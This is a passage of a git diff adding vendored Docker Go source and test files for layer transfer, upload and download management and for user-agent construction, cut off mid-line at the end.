*image.NewRootFS(), descriptors, progress.ChanOutput(progressChan)) + if err != nil { + t.Fatalf("download error: %v", err) + } + + releaseFunc() + + close(progressChan) + <-progressDone + + if len(rootFS.DiffIDs) != len(descriptors) { + t.Fatal("got wrong number of diffIDs in rootfs") + } + + for i, d := range descriptors { + descriptor := d.(*mockDownloadDescriptor) + + if descriptor.diffID != "" { + if receivedProgress[d.ID()].Action != "Already exists" { + t.Fatalf("did not get 'Already exists' message for %v", d.ID()) + } + } else if receivedProgress[d.ID()].Action != "Pull complete" { + t.Fatalf("did not get 'Pull complete' message for %v", d.ID()) + } + + if rootFS.DiffIDs[i] != descriptor.expectedDiffID { + t.Fatalf("rootFS item %d has the wrong diffID (expected: %v got: %v)", i, descriptor.expectedDiffID, rootFS.DiffIDs[i]) + } + + if descriptor.diffID == "" && descriptor.registeredDiffID != rootFS.DiffIDs[i] { + t.Fatal("diffID mismatch between rootFS and Registered callback") + } + } +} + +func TestCancelledDownload(t *testing.T) { + ldm := NewLayerDownloadManager(&mockLayerStore{make(map[layer.ChainID]*mockLayer)}, maxDownloadConcurrency) + + progressChan := make(chan progress.Progress) + progressDone := make(chan struct{}) + + go func() { + for range progressChan { + } + close(progressDone) + }() + + ctx, cancel := context.WithCancel(context.Background()) + + go func() { + <-time.After(time.Millisecond) + cancel() + }() + + descriptors := downloadDescriptors(nil) + _, _, err := ldm.Download(ctx, *image.NewRootFS(), descriptors, progress.ChanOutput(progressChan)) + if err != context.Canceled { + t.Fatal("expected download to be cancelled") + } + + close(progressChan) + <-progressDone +} diff --git a/vendor/github.com/docker/docker/distribution/xfer/transfer.go b/vendor/github.com/docker/docker/distribution/xfer/transfer.go new file mode 100644 index 0000000000..14f15660ac --- /dev/null +++ b/vendor/github.com/docker/docker/distribution/xfer/transfer.go @@ -0,0 +1,401 @@ +package xfer + +import ( + "runtime" + "sync" + + "github.com/docker/docker/pkg/progress" + "golang.org/x/net/context" +) + +// DoNotRetry is an error wrapper indicating that the error cannot be resolved +// with a retry. +type DoNotRetry struct { + Err error +} + +// Error returns the stringified representation of the encapsulated error. +func (e DoNotRetry) Error() string { + return e.Err.Error() +} + +// Watcher is returned by Watch and can be passed to Release to stop watching. +type Watcher struct { + // signalChan is used to signal to the watcher goroutine that + // new progress information is available, or that the transfer + // has finished. + signalChan chan struct{} + // releaseChan signals to the watcher goroutine that the watcher + // should be detached. + releaseChan chan struct{} + // running remains open as long as the watcher is watching the + // transfer. It gets closed if the transfer finishes or the + // watcher is detached. + running chan struct{} +} + +// Transfer represents an in-progress transfer. +type Transfer interface { + Watch(progressOutput progress.Output) *Watcher + Release(*Watcher) + Context() context.Context + Close() + Done() <-chan struct{} + Released() <-chan struct{} + Broadcast(masterProgressChan <-chan progress.Progress) +} + +type transfer struct { + mu sync.Mutex + + ctx context.Context + cancel context.CancelFunc + + // watchers keeps track of the goroutines monitoring progress output, + // indexed by the channels that release them. + watchers map[chan struct{}]*Watcher + + // lastProgress is the most recently received progress event. + lastProgress progress.Progress + // hasLastProgress is true when lastProgress has been set. + hasLastProgress bool + + // running remains open as long as the transfer is in progress. + running chan struct{} + // released stays open until all watchers release the transfer and + // the transfer is no longer tracked by the transfer manager. + released chan struct{} + + // broadcastDone is true if the master progress channel has closed. + broadcastDone bool + // closed is true if Close has been called + closed bool + // broadcastSyncChan allows watchers to "ping" the broadcasting + // goroutine to wait for it for deplete its input channel. This ensures + // a detaching watcher won't miss an event that was sent before it + // started detaching. + broadcastSyncChan chan struct{} +} + +// NewTransfer creates a new transfer. +func NewTransfer() Transfer { + t := &transfer{ + watchers: make(map[chan struct{}]*Watcher), + running: make(chan struct{}), + released: make(chan struct{}), + broadcastSyncChan: make(chan struct{}), + } + + // This uses context.Background instead of a caller-supplied context + // so that a transfer won't be cancelled automatically if the client + // which requested it is ^C'd (there could be other viewers). + t.ctx, t.cancel = context.WithCancel(context.Background()) + + return t +} + +// Broadcast copies the progress and error output to all viewers. +func (t *transfer) Broadcast(masterProgressChan <-chan progress.Progress) { + for { + var ( + p progress.Progress + ok bool + ) + select { + case p, ok = <-masterProgressChan: + default: + // We've depleted the channel, so now we can handle + // reads on broadcastSyncChan to let detaching watchers + // know we're caught up. + select { + case <-t.broadcastSyncChan: + continue + case p, ok = <-masterProgressChan: + } + } + + t.mu.Lock() + if ok { + t.lastProgress = p + t.hasLastProgress = true + for _, w := range t.watchers { + select { + case w.signalChan <- struct{}{}: + default: + } + } + } else { + t.broadcastDone = true + } + t.mu.Unlock() + if !ok { + close(t.running) + return + } + } +} + +// Watch adds a watcher to the transfer. The supplied channel gets progress +// updates and is closed when the transfer finishes. +func (t *transfer) Watch(progressOutput progress.Output) *Watcher { + t.mu.Lock() + defer t.mu.Unlock() + + w := &Watcher{ + releaseChan: make(chan struct{}), + signalChan: make(chan struct{}), + running: make(chan struct{}), + } + + t.watchers[w.releaseChan] = w + + if t.broadcastDone { + close(w.running) + return w + } + + go func() { + defer func() { + close(w.running) + }() + var ( + done bool + lastWritten progress.Progress + hasLastWritten bool + ) + for { + t.mu.Lock() + hasLastProgress := t.hasLastProgress + lastProgress := t.lastProgress + t.mu.Unlock() + + // Make sure we don't write the last progress item + // twice. + if hasLastProgress && (!done || !hasLastWritten || lastProgress != lastWritten) { + progressOutput.WriteProgress(lastProgress) + lastWritten = lastProgress + hasLastWritten = true + } + + if done { + return + } + + select { + case <-w.signalChan: + case <-w.releaseChan: + done = true + // Since the watcher is going to detach, make + // sure the broadcaster is caught up so we + // don't miss anything. + select { + case t.broadcastSyncChan <- struct{}{}: + case <-t.running: + } + case <-t.running: + done = true + } + } + }() + + return w +} + +// Release is the inverse of Watch; indicating that the watcher no longer wants +// to be notified about the progress of the transfer. All calls to Watch must +// be paired with later calls to Release so that the lifecycle of the transfer +// is properly managed. +func (t *transfer) Release(watcher *Watcher) { + t.mu.Lock() + delete(t.watchers, watcher.releaseChan) + + if len(t.watchers) == 0 { + if t.closed { + // released may have been closed already if all + // watchers were released, then another one was added + // while waiting for a previous watcher goroutine to + // finish. + select { + case <-t.released: + default: + close(t.released) + } + } else { + t.cancel() + } + } + t.mu.Unlock() + + close(watcher.releaseChan) + // Block until the watcher goroutine completes + <-watcher.running +} + +// Done returns a channel which is closed if the transfer completes or is +// cancelled. Note that having 0 watchers causes a transfer to be cancelled. +func (t *transfer) Done() <-chan struct{} { + // Note that this doesn't return t.ctx.Done() because that channel will + // be closed the moment Cancel is called, and we need to return a + // channel that blocks until a cancellation is actually acknowledged by + // the transfer function. + return t.running +} + +// Released returns a channel which is closed once all watchers release the +// transfer AND the transfer is no longer tracked by the transfer manager. +func (t *transfer) Released() <-chan struct{} { + return t.released +} + +// Context returns the context associated with the transfer. +func (t *transfer) Context() context.Context { + return t.ctx +} + +// Close is called by the transfer manager when the transfer is no longer +// being tracked. +func (t *transfer) Close() { + t.mu.Lock() + t.closed = true + if len(t.watchers) == 0 { + close(t.released) + } + t.mu.Unlock() +} + +// DoFunc is a function called by the transfer manager to actually perform +// a transfer. It should be non-blocking. It should wait until the start channel +// is closed before transferring any data. If the function closes inactive, that +// signals to the transfer manager that the job is no longer actively moving +// data - for example, it may be waiting for a dependent transfer to finish. +// This prevents it from taking up a slot. +type DoFunc func(progressChan chan<- progress.Progress, start <-chan struct{}, inactive chan<- struct{}) Transfer + +// TransferManager is used by LayerDownloadManager and LayerUploadManager to +// schedule and deduplicate transfers. It is up to the TransferManager +// implementation to make the scheduling and concurrency decisions. +type TransferManager interface { + // Transfer checks if a transfer with the given key is in progress. If + // so, it returns progress and error output from that transfer. + // Otherwise, it will call xferFunc to initiate the transfer. + Transfer(key string, xferFunc DoFunc, progressOutput progress.Output) (Transfer, *Watcher) + // SetConcurrency set the concurrencyLimit so that it is adjustable daemon reload + SetConcurrency(concurrency int) +} + +type transferManager struct { + mu sync.Mutex + + concurrencyLimit int + activeTransfers int + transfers map[string]Transfer + waitingTransfers []chan struct{} +} + +// NewTransferManager returns a new TransferManager. +func NewTransferManager(concurrencyLimit int) TransferManager { + return &transferManager{ + concurrencyLimit: concurrencyLimit, + transfers: make(map[string]Transfer), + } +} + +// SetConcurrency set the concurrencyLimit +func (tm *transferManager) SetConcurrency(concurrency int) { + tm.mu.Lock() + tm.concurrencyLimit = concurrency + tm.mu.Unlock() +} + +// Transfer checks if a transfer matching the given key is in progress. If not, +// it starts one by calling xferFunc. The caller supplies a channel which +// receives progress output from the transfer. +func (tm *transferManager) Transfer(key string, xferFunc DoFunc, progressOutput progress.Output) (Transfer, *Watcher) { + tm.mu.Lock() + defer tm.mu.Unlock() + + for { + xfer, present := tm.transfers[key] + if !present { + break + } + // Transfer is already in progress. + watcher := xfer.Watch(progressOutput) + + select { + case <-xfer.Context().Done(): + // We don't want to watch a transfer that has been cancelled. + // Wait for it to be removed from the map and try again. + xfer.Release(watcher) + tm.mu.Unlock() + // The goroutine that removes this transfer from the + // map is also waiting for xfer.Done(), so yield to it. + // This could be avoided by adding a Closed method + // to Transfer to allow explicitly waiting for it to be + // removed the map, but forcing a scheduling round in + // this very rare case seems better than bloating the + // interface definition. + runtime.Gosched() + <-xfer.Done() + tm.mu.Lock() + default: + return xfer, watcher + } + } + + start := make(chan struct{}) + inactive := make(chan struct{}) + + if tm.concurrencyLimit == 0 || tm.activeTransfers < tm.concurrencyLimit { + close(start) + tm.activeTransfers++ + } else { + tm.waitingTransfers = append(tm.waitingTransfers, start) + } + + masterProgressChan := make(chan progress.Progress) + xfer := xferFunc(masterProgressChan, start, inactive) + watcher := xfer.Watch(progressOutput) + go xfer.Broadcast(masterProgressChan) + tm.transfers[key] = xfer + + // When the transfer is finished, remove from the map. + go func() { + for { + select { + case <-inactive: + tm.mu.Lock() + tm.inactivate(start) + tm.mu.Unlock() + inactive = nil + case <-xfer.Done(): + tm.mu.Lock() + if inactive != nil { + tm.inactivate(start) + } + delete(tm.transfers, key) + tm.mu.Unlock() + xfer.Close() + return + } + } + }() + + return xfer, watcher +} + +func (tm *transferManager) inactivate(start chan struct{}) { + // If the transfer was started, remove it from the activeTransfers + // count. + select { + case <-start: + // Start next transfer if any are waiting + if len(tm.waitingTransfers) != 0 { + close(tm.waitingTransfers[0]) + tm.waitingTransfers = tm.waitingTransfers[1:] + } else { + tm.activeTransfers-- + } + default: + } +} diff --git a/vendor/github.com/docker/docker/distribution/xfer/transfer_test.go b/vendor/github.com/docker/docker/distribution/xfer/transfer_test.go new file mode 100644 index 0000000000..6c50ce3524 --- /dev/null +++ b/vendor/github.com/docker/docker/distribution/xfer/transfer_test.go @@ -0,0 +1,410 @@ +package xfer + +import ( + "sync/atomic" + "testing" + "time" + + "github.com/docker/docker/pkg/progress" +) + +func TestTransfer(t *testing.T) { + makeXferFunc := func(id string) DoFunc { + return func(progressChan chan<- progress.Progress, start <-chan struct{}, inactive chan<- struct{}) Transfer { + select { + case <-start: + default: + t.Fatalf("transfer function not started even though concurrency limit not reached") + } + + xfer := NewTransfer() + go func() { + for i := 0; i <= 10; i++ { + progressChan <- progress.Progress{ID: id, Action: "testing", Current: int64(i), Total: 10} + time.Sleep(10 * time.Millisecond) + } + close(progressChan) + }() + return xfer + } + } + + tm := NewTransferManager(5) + progressChan := make(chan progress.Progress) + progressDone := make(chan struct{}) + receivedProgress := make(map[string]int64) + + go func() { + for p := range progressChan { + val, present := receivedProgress[p.ID] + if present && p.Current <= val { + t.Fatalf("got unexpected progress value: %d (expected %d)", p.Current, val+1) + } + receivedProgress[p.ID] = p.Current + } + close(progressDone) + }() + + // Start a few transfers + ids := []string{"id1", "id2", "id3"} + xfers := make([]Transfer, len(ids)) + watchers := make([]*Watcher, len(ids)) + for i, id := range ids { + xfers[i], watchers[i] = tm.Transfer(id, makeXferFunc(id), progress.ChanOutput(progressChan)) + } + + for i, xfer := range xfers { + <-xfer.Done() + xfer.Release(watchers[i]) + } + close(progressChan) + <-progressDone + + for _, id := range ids { + if receivedProgress[id] != 10 { + t.Fatalf("final progress value %d instead of 10", receivedProgress[id]) + } + } +} + +func TestConcurrencyLimit(t *testing.T) { + concurrencyLimit := 3 + var runningJobs int32 + + makeXferFunc := func(id string) DoFunc { + return func(progressChan chan<- progress.Progress, start <-chan struct{}, inactive chan<- struct{}) Transfer { + xfer := NewTransfer() + go func() { + <-start + totalJobs := atomic.AddInt32(&runningJobs, 1) + if int(totalJobs) > concurrencyLimit { + t.Fatalf("too many jobs running") + } + for i := 0; i <= 10; i++ { + progressChan <- progress.Progress{ID: id, Action: "testing", Current: int64(i), Total: 10} + time.Sleep(10 * time.Millisecond) + } + atomic.AddInt32(&runningJobs, -1) + close(progressChan) + }() + return xfer + } + } + + tm := NewTransferManager(concurrencyLimit) + progressChan := make(chan progress.Progress) + progressDone := make(chan struct{}) + receivedProgress := make(map[string]int64) + + go func() { + for p := range progressChan { + receivedProgress[p.ID] = p.Current + } + close(progressDone) + }() + + // Start more transfers than the concurrency limit + ids := []string{"id1", "id2", "id3", "id4", "id5", "id6", "id7", "id8"} + xfers := make([]Transfer, len(ids)) + watchers := make([]*Watcher, len(ids)) + for i, id := range ids { + xfers[i], watchers[i] = tm.Transfer(id, makeXferFunc(id), progress.ChanOutput(progressChan)) + } + + for i, xfer := range xfers { + <-xfer.Done() + xfer.Release(watchers[i]) + } + close(progressChan) + <-progressDone + + for _, id := range ids { + if receivedProgress[id] != 10 { + t.Fatalf("final progress value %d instead of 10", receivedProgress[id]) + } + } +} + +func TestInactiveJobs(t *testing.T) { + concurrencyLimit := 3 + var runningJobs int32 + testDone := make(chan struct{}) + + makeXferFunc := func(id string) DoFunc { + return func(progressChan chan<- progress.Progress, start <-chan struct{}, inactive chan<- struct{}) Transfer { + xfer := NewTransfer() + go func() { + <-start + totalJobs := atomic.AddInt32(&runningJobs, 1) + if int(totalJobs) > concurrencyLimit { + t.Fatalf("too many jobs running") + } + for i := 0; i <= 10; i++ { + progressChan <- progress.Progress{ID: id, Action: "testing", Current: int64(i), Total: 10} + time.Sleep(10 * time.Millisecond) + } + atomic.AddInt32(&runningJobs, -1) + close(inactive) + <-testDone + close(progressChan) + }() + return xfer + } + } + + tm := NewTransferManager(concurrencyLimit) + progressChan := make(chan progress.Progress) + progressDone := make(chan struct{}) + receivedProgress := make(map[string]int64) + + go func() { + for p := range progressChan { + receivedProgress[p.ID] = p.Current + } + close(progressDone) + }() + + // Start more transfers than the concurrency limit + ids := []string{"id1", "id2", "id3", "id4", "id5", "id6", "id7", "id8"} + xfers := make([]Transfer, len(ids)) + watchers := make([]*Watcher, len(ids)) + for i, id := range ids { + xfers[i], watchers[i] = tm.Transfer(id, makeXferFunc(id), progress.ChanOutput(progressChan)) + } + + close(testDone) + for i, xfer := range xfers { + <-xfer.Done() + xfer.Release(watchers[i]) + } + close(progressChan) + <-progressDone + + for _, id := range ids { + if receivedProgress[id] != 10 { + t.Fatalf("final progress value %d instead of 10", receivedProgress[id]) + } + } +} + +func TestWatchRelease(t *testing.T) { + ready := make(chan struct{}) + + makeXferFunc := func(id string) DoFunc { + return func(progressChan chan<- progress.Progress, start <-chan struct{}, inactive chan<- struct{}) Transfer { + xfer := NewTransfer() + go func() { + defer func() { + close(progressChan) + }() + <-ready + for i := int64(0); ; i++ { + select { + case <-time.After(10 * time.Millisecond): + case <-xfer.Context().Done(): + return + } + progressChan <- progress.Progress{ID: id, Action: "testing", Current: i, Total: 10} + } + }() + return xfer + } + } + + tm := NewTransferManager(5) + + type watcherInfo struct { + watcher *Watcher + progressChan chan progress.Progress + progressDone chan struct{} + receivedFirstProgress chan struct{} + } + + progressConsumer := func(w watcherInfo) { + first := true + for range w.progressChan { + if first { + close(w.receivedFirstProgress) + } + first = false + } + close(w.progressDone) + } + + // Start a transfer + watchers := make([]watcherInfo, 5) + var xfer Transfer + watchers[0].progressChan = make(chan progress.Progress) + watchers[0].progressDone = make(chan struct{}) + watchers[0].receivedFirstProgress = make(chan struct{}) + xfer, watchers[0].watcher = tm.Transfer("id1", makeXferFunc("id1"), progress.ChanOutput(watchers[0].progressChan)) + go progressConsumer(watchers[0]) + + // Give it multiple watchers + for i := 1; i != len(watchers); i++ { + watchers[i].progressChan = make(chan progress.Progress) + watchers[i].progressDone = make(chan struct{}) + watchers[i].receivedFirstProgress = make(chan struct{}) + watchers[i].watcher = xfer.Watch(progress.ChanOutput(watchers[i].progressChan)) + go progressConsumer(watchers[i]) + } + + // Now that the watchers are set up, allow the transfer goroutine to + // proceed. + close(ready) + + // Confirm that each watcher gets progress output. + for _, w := range watchers { + <-w.receivedFirstProgress + } + + // Release one watcher every 5ms + for _, w := range watchers { + xfer.Release(w.watcher) + <-time.After(5 * time.Millisecond) + } + + // Now that all watchers have been released, Released() should + // return a closed channel. + <-xfer.Released() + + // Done() should return a closed channel because the xfer func returned + // due to cancellation. + <-xfer.Done() + + for _, w := range watchers { + close(w.progressChan) + <-w.progressDone + } +} + +func TestWatchFinishedTransfer(t *testing.T) { + makeXferFunc := func(id string) DoFunc { + return func(progressChan chan<- progress.Progress, start <-chan struct{}, inactive chan<- struct{}) Transfer { + xfer := NewTransfer() + go func() { + // Finish immediately + close(progressChan) + }() + return xfer + } + } + + tm := NewTransferManager(5) + + // Start a transfer + watchers := make([]*Watcher, 3) + var xfer Transfer + xfer, watchers[0] = tm.Transfer("id1", makeXferFunc("id1"), progress.ChanOutput(make(chan progress.Progress))) + + // Give it a watcher immediately + watchers[1] = xfer.Watch(progress.ChanOutput(make(chan progress.Progress))) + + // Wait for the transfer to complete + <-xfer.Done() + + // Set up another watcher + watchers[2] = xfer.Watch(progress.ChanOutput(make(chan progress.Progress))) + + // Release the watchers + for _, w := range watchers { + xfer.Release(w) + } + + // Now that all watchers have been released, Released() should + // return a closed channel. + <-xfer.Released() +} + +func TestDuplicateTransfer(t *testing.T) { + ready := make(chan struct{}) + + var xferFuncCalls int32 + + makeXferFunc := func(id string) DoFunc { + return func(progressChan chan<- progress.Progress, start <-chan struct{}, inactive chan<- struct{}) Transfer { + atomic.AddInt32(&xferFuncCalls, 1) + xfer := NewTransfer() + go func() { + defer func() { + close(progressChan) + }() + <-ready + for i := int64(0); ; i++ { + select { + case <-time.After(10 * time.Millisecond): + case <-xfer.Context().Done(): + return + } + progressChan <- progress.Progress{ID: id, Action: "testing", Current: i, Total: 10} + } + }() + return xfer + } + } + + tm := NewTransferManager(5) + + type transferInfo struct { + xfer Transfer + watcher *Watcher + progressChan chan progress.Progress + progressDone chan struct{} + receivedFirstProgress chan struct{} + } + + progressConsumer := func(t transferInfo) { + first := true + for range t.progressChan { + if first { + close(t.receivedFirstProgress) + } + first = false + } + close(t.progressDone) + } + + // Try to start multiple transfers with the same ID + transfers := make([]transferInfo, 5) + for i := range transfers { + t := &transfers[i] + t.progressChan = make(chan progress.Progress) + t.progressDone = make(chan struct{}) + t.receivedFirstProgress = make(chan struct{}) + t.xfer, t.watcher = tm.Transfer("id1", makeXferFunc("id1"), progress.ChanOutput(t.progressChan)) + go progressConsumer(*t) + } + + // Allow the transfer goroutine to proceed. + close(ready) + + // Confirm that each watcher gets progress output. + for _, t := range transfers { + <-t.receivedFirstProgress + } + + // Confirm that the transfer function was called exactly once. + if xferFuncCalls != 1 { + t.Fatal("transfer function wasn't called exactly once") + } + + // Release one watcher every 5ms + for _, t := range transfers { + t.xfer.Release(t.watcher) + <-time.After(5 * time.Millisecond) + } + + for _, t := range transfers { + // Now that all watchers have been released, Released() should + // return a closed channel. + <-t.xfer.Released() + // Done() should return a closed channel because the xfer func returned + // due to cancellation. + <-t.xfer.Done() + } + + for _, t := range transfers { + close(t.progressChan) + <-t.progressDone + } +} diff --git a/vendor/github.com/docker/docker/distribution/xfer/upload.go b/vendor/github.com/docker/docker/distribution/xfer/upload.go new file mode 100644 index 0000000000..ad3398369c --- /dev/null +++ b/vendor/github.com/docker/docker/distribution/xfer/upload.go @@ -0,0 +1,168 @@ +package xfer + +import ( + "errors" + "time" + + "github.com/Sirupsen/logrus" + "github.com/docker/distribution" + "github.com/docker/docker/layer" + "github.com/docker/docker/pkg/progress" + "golang.org/x/net/context" +) + +const maxUploadAttempts = 5 + +// LayerUploadManager provides task management and progress reporting for +// uploads. +type LayerUploadManager struct { + tm TransferManager +} + +// SetConcurrency set the max concurrent uploads for each push +func (lum *LayerUploadManager) SetConcurrency(concurrency int) { + lum.tm.SetConcurrency(concurrency) +} + +// NewLayerUploadManager returns a new LayerUploadManager. +func NewLayerUploadManager(concurrencyLimit int) *LayerUploadManager { + return &LayerUploadManager{ + tm: NewTransferManager(concurrencyLimit), + } +} + +type uploadTransfer struct { + Transfer + + remoteDescriptor distribution.Descriptor + err error +} + +// An UploadDescriptor references a layer that may need to be uploaded. +type UploadDescriptor interface { + // Key returns the key used to deduplicate uploads. + Key() string + // ID returns the ID for display purposes. + ID() string + // DiffID should return the DiffID for this layer. + DiffID() layer.DiffID + // Upload is called to perform the Upload. + Upload(ctx context.Context, progressOutput progress.Output) (distribution.Descriptor, error) + // SetRemoteDescriptor provides the distribution.Descriptor that was + // returned by Upload. This descriptor is not to be confused with + // the UploadDescriptor interface, which is used for internally + // identifying layers that are being uploaded. + SetRemoteDescriptor(descriptor distribution.Descriptor) +} + +// Upload is a blocking function which ensures the listed layers are present on +// the remote registry. It uses the string returned by the Key method to +// deduplicate uploads. +func (lum *LayerUploadManager) Upload(ctx context.Context, layers []UploadDescriptor, progressOutput progress.Output) error { + var ( + uploads []*uploadTransfer + dedupDescriptors = make(map[string]*uploadTransfer) + ) + + for _, descriptor := range layers { + progress.Update(progressOutput, descriptor.ID(), "Preparing") + + key := descriptor.Key() + if _, present := dedupDescriptors[key]; present { + continue + } + + xferFunc := lum.makeUploadFunc(descriptor) + upload, watcher := lum.tm.Transfer(descriptor.Key(), xferFunc, progressOutput) + defer upload.Release(watcher) + uploads = append(uploads, upload.(*uploadTransfer)) + dedupDescriptors[key] = upload.(*uploadTransfer) + } + + for _, upload := range uploads { + select { + case <-ctx.Done(): + return ctx.Err() + case <-upload.Transfer.Done(): + if upload.err != nil { + return upload.err + } + } + } + for _, l := range layers { + l.SetRemoteDescriptor(dedupDescriptors[l.Key()].remoteDescriptor) + } + + return nil +} + +func (lum *LayerUploadManager) makeUploadFunc(descriptor UploadDescriptor) DoFunc { + return func(progressChan chan<- progress.Progress, start <-chan struct{}, inactive chan<- struct{}) Transfer { + u := &uploadTransfer{ + Transfer: NewTransfer(), + } + + go func() { + defer func() { + close(progressChan) + }() + + progressOutput := progress.ChanOutput(progressChan) + + select { + case <-start: + default: + progress.Update(progressOutput, descriptor.ID(), "Waiting") + <-start + } + + retries := 0 + for { + remoteDescriptor, err := descriptor.Upload(u.Transfer.Context(), progressOutput) + if err == nil { + u.remoteDescriptor = remoteDescriptor + break + } + + // If an error was returned because the context + // was cancelled, we shouldn't retry. + select { + case <-u.Transfer.Context().Done(): + u.err = err + return + default: + } + + retries++ + if _, isDNR := err.(DoNotRetry); isDNR || retries == maxUploadAttempts { + logrus.Errorf("Upload failed: %v", err) + u.err = err + return + } + + logrus.Errorf("Upload failed, retrying: %v", err) + delay := retries * 5 + ticker := time.NewTicker(time.Second) + + selectLoop: + for { + progress.Updatef(progressOutput, descriptor.ID(), "Retrying in %d second%s", delay, (map[bool]string{true: "s"})[delay != 1]) + select { + case <-ticker.C: + delay-- + if delay == 0 { + ticker.Stop() + break selectLoop + } + case <-u.Transfer.Context().Done(): + ticker.Stop() + u.err = errors.New("upload cancelled during retry delay") + return + } + } + } + }() + + return u + } +} diff --git a/vendor/github.com/docker/docker/distribution/xfer/upload_test.go b/vendor/github.com/docker/docker/distribution/xfer/upload_test.go new file mode 100644 index 0000000000..16bd187336 --- /dev/null +++ b/vendor/github.com/docker/docker/distribution/xfer/upload_test.go @@ -0,0 +1,134 @@ +package xfer + +import ( + "errors" + "sync/atomic" + "testing" + "time" + + "github.com/docker/distribution" + "github.com/docker/docker/layer" + "github.com/docker/docker/pkg/progress" + "golang.org/x/net/context" +) + +const maxUploadConcurrency = 3 + +type mockUploadDescriptor struct { + currentUploads *int32 + diffID layer.DiffID + simulateRetries int +} + +// Key returns the key used to deduplicate downloads. +func (u *mockUploadDescriptor) Key() string { + return u.diffID.String() +} + +// ID returns the ID for display purposes. +func (u *mockUploadDescriptor) ID() string { + return u.diffID.String() +} + +// DiffID should return the DiffID for this layer. +func (u *mockUploadDescriptor) DiffID() layer.DiffID { + return u.diffID +} + +// SetRemoteDescriptor is not used in the mock. +func (u *mockUploadDescriptor) SetRemoteDescriptor(remoteDescriptor distribution.Descriptor) { +} + +// Upload is called to perform the upload. +func (u *mockUploadDescriptor) Upload(ctx context.Context, progressOutput progress.Output) (distribution.Descriptor, error) { + if u.currentUploads != nil { + defer atomic.AddInt32(u.currentUploads, -1) + + if atomic.AddInt32(u.currentUploads, 1) > maxUploadConcurrency { + return distribution.Descriptor{}, errors.New("concurrency limit exceeded") + } + } + + // Sleep a bit to simulate a time-consuming upload. + for i := int64(0); i <= 10; i++ { + select { + case <-ctx.Done(): + return distribution.Descriptor{}, ctx.Err() + case <-time.After(10 * time.Millisecond): + progressOutput.WriteProgress(progress.Progress{ID: u.ID(), Current: i, Total: 10}) + } + } + + if u.simulateRetries != 0 { + u.simulateRetries-- + return distribution.Descriptor{}, errors.New("simulating retry") + } + + return distribution.Descriptor{}, nil +} + +func uploadDescriptors(currentUploads *int32) []UploadDescriptor { + return []UploadDescriptor{ + &mockUploadDescriptor{currentUploads, layer.DiffID("sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf"), 0}, + &mockUploadDescriptor{currentUploads, layer.DiffID("sha256:1515325234325236634634608943609283523908626098235490238423902343"), 0}, + &mockUploadDescriptor{currentUploads, layer.DiffID("sha256:6929356290463485374960346430698374523437683470934634534953453453"), 0}, + &mockUploadDescriptor{currentUploads, layer.DiffID("sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf"), 0}, + &mockUploadDescriptor{currentUploads, layer.DiffID("sha256:8159352387436803946235346346368745389534789534897538734598734987"), 1}, + &mockUploadDescriptor{currentUploads, layer.DiffID("sha256:4637863963478346897346987346987346789346789364879364897364987346"), 0}, + } +} + +func TestSuccessfulUpload(t *testing.T) { + lum := NewLayerUploadManager(maxUploadConcurrency) + + progressChan := make(chan progress.Progress) + progressDone := make(chan struct{}) + receivedProgress := make(map[string]int64) + + go func() { + for p := range progressChan { + receivedProgress[p.ID] = p.Current + } + close(progressDone) + }() + + var currentUploads int32 + descriptors := uploadDescriptors(¤tUploads) + + err := lum.Upload(context.Background(), descriptors, progress.ChanOutput(progressChan)) + if err != nil { + t.Fatalf("upload error: %v", err) + } + + close(progressChan) + <-progressDone +} + +func TestCancelledUpload(t *testing.T) { + lum := NewLayerUploadManager(maxUploadConcurrency) + + progressChan := make(chan progress.Progress) + progressDone := make(chan struct{}) + + go func() { + for range progressChan { + } + close(progressDone) + }() + + ctx, cancel := context.WithCancel(context.Background()) + + go func() { + <-time.After(time.Millisecond) + cancel() + }() + + descriptors := uploadDescriptors(nil) + err := lum.Upload(ctx, descriptors, progress.ChanOutput(progressChan)) + if err != context.Canceled { + t.Fatal("expected upload to be cancelled") + } + + close(progressChan) + <-progressDone +} diff --git a/vendor/github.com/docker/docker/dockerversion/useragent.go b/vendor/github.com/docker/docker/dockerversion/useragent.go new file mode 100644 index 0000000000..d2a891c4d6 --- /dev/null +++ b/vendor/github.com/docker/docker/dockerversion/useragent.go @@ -0,0 +1,74 @@ +package dockerversion + +import ( + "fmt" + "runtime" + + "github.com/docker/docker/api/server/httputils" + "github.com/docker/docker/pkg/parsers/kernel" + "github.com/docker/docker/pkg/useragent" + "golang.org/x/net/context" +) + +// DockerUserAgent is the User-Agent the Docker client uses to identify itself. +// In accordance with RFC 7231 (5.5.3) is of the form: +// [docker client's UA] UpstreamClient([upstream client's UA]) +func DockerUserAgent(ctx context.Context) string { + httpVersion := make([]useragent.VersionInfo, 0, 6) + httpVersion = append(httpVersion, useragent.VersionInfo{Name: "docker", Version: Version}) + httpVersion = append(httpVersion, useragent.VersionInfo{Name: "go", Version: runtime.Version()}) + httpVersion = append(httpVersion, useragent.VersionInfo{Name: "git-commit", Version: GitCommit}) + if kernelVersion, err := kernel.GetKernelVersion(); err == nil { + httpVersion = append(httpVersion, useragent.VersionInfo{Name: "kernel", Version: kernelVersion.String()}) + } + httpVersion = append(httpVersion, useragent.VersionInfo{Name: "os", Version: runtime.GOOS}) + httpVersion = append(httpVersion, useragent.VersionInfo{Name: "arch", Version: runtime.GOARCH}) + + dockerUA := useragent.AppendVersions("", httpVersion...) + upstreamUA := getUserAgentFromContext(ctx) + if len(upstreamUA) > 0 { + ret := insertUpstreamUserAgent(upstreamUA, dockerUA) + return ret + } + return dockerUA +} + +// getUserAgentFromContext returns the previously saved user-agent context stored in ctx, if one exists +func getUserAgentFromContext(ctx context.Context) string { + var upstreamUA string + if ctx != nil { + var ki interface{} = ctx.Value(httputils.UAStringKey) + if ki != nil { + upstreamUA = ctx.Value(httputils.UAStringKey).(string) + } + } + return upstreamUA +} + +// escapeStr returns s with every rune in charsToEscape escaped by a backslash +func escapeStr(s string, charsToEscape string) string { + var ret string + for _, currRune := range s { + appended := false + for _, escapeableRune := range charsToEscape { + if currRune == escapeableRune { + ret += `\` + string(currRune) + appended = true + break + } + } + if !appended { + ret += string(currRune) + } + } + return ret +} + +// insertUpstreamUserAgent adds the upstream client useragent to create a user-agent +// string of the form: +// $dockerUA UpstreamClient($upstreamUA) +func insertUpstreamUserAgent(upstreamUA string, dockerUA string) string { + charsToEscape := `();\` + upstreamUAEscaped := escapeStr(upstreamUA, charsToEscape) + return fmt.Sprintf("%s 